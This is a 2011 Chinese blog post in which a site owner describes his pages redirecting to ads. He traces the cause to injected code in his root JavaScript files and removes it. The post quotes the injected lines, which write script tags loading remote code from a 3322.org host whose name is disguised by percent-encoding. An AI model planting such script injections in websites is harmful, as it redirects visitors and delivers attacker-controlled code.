网站JS文件被植入跳转木马代码

2011-12-07 11:35:55  阅读 651 次 评论 3 条

   这几天,为网站博客首页打开会跳转到其他网页一事,而烦,而累。真搞不明白。那些人是如何把一段广告代码硬是植入到我的网站文件上的。

  
  一发现我的网站打开后。会跳转到其他广告网页时,我就很怕。一是不知原因,二是相信这一定是中毒了。
  
  我问主机商,他们说,我的VPS没有中毒,也没有挂马。这样一来。我就觉得,应该是我的FTP空间上的网页文件有问题。
  
  逐一查是不可能的。但在网上搜到一个说法。凡是网页被挂木马,出现跳转的情况。都是通过JS文件实现的。
  
  也就是说,我的网站JS文件有问题,而且一定是根目录下的JS文件。于是,把它下载下来,细看。发现,里面的十个JS文件,每个文件都有写上以下这一串广告代码:
    
document.writeln ("<script src=\"http://%61dsend.3322.org\"><\/script>");
document.writeln ("<script src=\"http://adsend.3%3322.org\"><\/script>");
document.writeln ("<script src=\"http://adsend.332%32.org\"><\/script>");
document.writeln ("<script src=\"http://ads%65nd.3322.org\"><\/script>");
document.writeln ("<script src=\"http://adsend.3322.o%72g\"><\/script>");
document.writeln ("<script src=\"http://adsend.33%322.org\"><\/script>");
document.writeln ("<script src=\"http://ads%65nd.3322.org\"><\/script>");
  
  真TMD强悍。这个黑客也真强,这种手段也来了。以上这些代码压根儿就不是我加的。而是被加的。马上将之删掉。重新上传覆盖。打开网页,没有跳转了。唉。做站真难呀。(文/汤树东)
本文地址:http://www.tangboke.cn/post/1071.html
版权声明:本文为原创文章,版权归 汤树东 所有,欢迎分享本文,转载请保留出处!

发表评论


表情

评论列表

  1. 豆诺博客
    豆诺博客  @回复

    代码都是写的正则表达式,对吗?

  2. Mr.zhou
    Mr.zhou  @回复

    做站太难了,哎,站长呀.

  3. s7ool
    s7ool  @回复

    典型下载者